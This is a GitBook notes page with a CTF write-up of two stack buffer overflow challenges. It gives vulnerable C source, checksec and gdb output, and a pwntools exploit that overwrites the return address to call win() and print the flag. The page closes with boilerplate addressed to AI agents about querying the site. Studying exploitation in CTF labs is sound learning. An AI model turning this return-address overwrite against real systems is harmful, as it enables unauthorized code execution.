> For the complete documentation index, see [llms.txt](https://fg0x0.gitbook.io/fg0x0s-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://fg0x0.gitbook.io/fg0x0s-notes/red-team/binary-exploitation/buffer-overflow.md).

# Buffer Overflow

## #1 Simple BoF

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
  printf("%s\n", flag);
  fflush(stdout);
  exit(1);
}

void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);
}

int main(int argc, char **argv){
  
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);


  printf("Input: ");
  fflush(stdout);
  char buf1[100];
  gets(buf1); 
  vuln(buf1);
  printf("The program will exit now\n");
  return 0;
}
```

```
┌─[root@kali]─[]
└──╼ $ nc saturn.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

## #2&#x20;

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}
```

```
┌─[root@kali]─[bof_1]
└──╼ $ checksec vuln
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
```

```
gef➤  p win
$1 = {<text variable, no debug info>} 0x80491f6 <win>
```

```
gef➤  r
Starting program: /bof_1/vuln 
Please enter your string: 
AAAAAAAA

...
gef➤  search-pattern AAAAAAAA
[+] Searching 'AAAAAAAA' in memory
[+] In '[heap]'(0x804d000-0x806f000), permission=rwx
  0x804d1a0 - 0x804d1aa  →   "AAAAAAAA\n" 
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
  0xffffd050 - 0xffffd058  →   "AAAAAAAA" 
gef➤  i f
Stack level 0, frame at 0xffffd080:
 eip = 0x80492a3 in vuln; saved eip = 0x804932f
 called by frame at 0xffffd0b0
 Arglist at 0xffffd03c, args: 
 Locals at 0xffffd03c, Previous frame's sp is 0xffffd080
 Saved registers:
  ebx at 0xffffd074, ebp at 0xffffd078, eip at 0xffffd07c
```

```python
from pwn import *

elf = ELF('./vuln')
libc = elf.libc

if args.REMOTE:
    p = remote('saturn.net',61406)
else:
    p = process(elf.path)

# payload buffer
payload = b'A'*44
payload += p32(0x80491f6)

print(p.recvuntil(':'))
p.send(payload)
p.interactive()
```

```
┌─[root@kali]─[/bof_1]
└──╼ $ python3 bof1.py REMOTE
[*] '/bof_1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[*] '/usr/lib32/libc-2.31.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to saturn.picoctf.net on port 61406: Done
b'Please enter your string:'
[*] Switching to interactive mode

$ 
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
CTF{addr3ss3s_ar3_3asy_60fac6aa}
[*] Got EOF while reading in interactive
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://fg0x0.gitbook.io/fg0x0s-notes/red-team/binary-exploitation/buffer-overflow.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.